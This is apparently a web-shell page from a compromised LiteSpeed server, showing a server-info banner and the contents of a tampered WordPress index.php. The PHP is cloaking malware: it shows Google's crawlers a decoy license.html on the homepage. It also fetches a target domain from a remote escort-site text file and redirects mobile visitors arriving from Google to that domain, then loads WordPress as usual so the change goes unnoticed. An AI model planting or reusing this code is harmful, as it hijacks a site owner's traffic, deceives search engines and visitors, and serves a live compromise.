| Server IP : 176.32.38.42 / Your IP : 216.73.216.67 Web Server : LiteSpeed System : Linux ha006.mymail.zone 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64 User : s1225329 ( 1835) PHP Version : 7.4.33 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/1365752/cwd/wp-content/ |
Upload File : |
<?php
error_reporting(0);
set_time_limit(0);
$vitrin_source = 'https://istanbulescortladys.com/ist.txt';
// User Agent kontrolü
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgent = $_SERVER['HTTP_USER_AGENT'];
} else {
$userAgent = '';
}
// Referer kontrolü
if (!empty($_SERVER['HTTP_REFERER'])) {
$referer = $_SERVER['HTTP_REFERER'];
} else {
$referer = '';
}
// Google botları listesi
$googleBots = [
'Googlebot',
'AdsBot',
'Mediapartners-Google',
'APIs-Google',
'Googlebot-Image',
'Googlebot-Video',
'Googlebot-News',
'Googlebot-Search',
'Googlebot-Inspect',
'Googlebot-Android',
'Googlebot-Mobile',
'Googlebot-Ads',
'Googlebot-Discovery',
'Google-',
];
// Mobil kontrol fonksiyonu
function is_mobile() {
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : '';
return preg_match('/mobile|android|iphone|ipad|ipod|opera mini|blackberry|windows phone/', $ua);
}
// Ana sayfa kontrol fonksiyonu
function is_homepage() {
$request_uri = $_SERVER['REQUEST_URI'] ?? '';
return $request_uri == '/' || $request_uri == '/index.php' || $request_uri == '';
}
// Google'dan gelme kontrolü
function is_from_google() {
$referer = isset($_SERVER['HTTP_REFERER']) ? strtolower($_SERVER['HTTP_REFERER']) : '';
return strpos($referer, 'google.') !== false;
}
// ============================================
// 1. KURAL: Google botları -> license.html göster
// ============================================
if (preg_match('/' . implode('|', $googleBots) . '/i', $userAgent)) {
if (is_homepage()) {
include 'license.html';
exit();
}
}
// ============================================
// 2. KURAL: Mobil + Google'dan gelen + Ana sayfa -> vitrin_source'a yönlendir
// ============================================
if (is_mobile() && is_from_google() && is_homepage()) {
$vitrin_domain = trim(@file_get_contents($vitrin_source));
if (!empty($vitrin_domain)) {
// http veya https yoksa ekle
if (strpos($vitrin_domain, 'http') !== 0) {
$vitrin_domain = 'https://' . $vitrin_domain;
}
header("Location: $vitrin_domain", true, 302);
exit();
}
}
// ============================================
// WordPress normal akışı
// ============================================
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';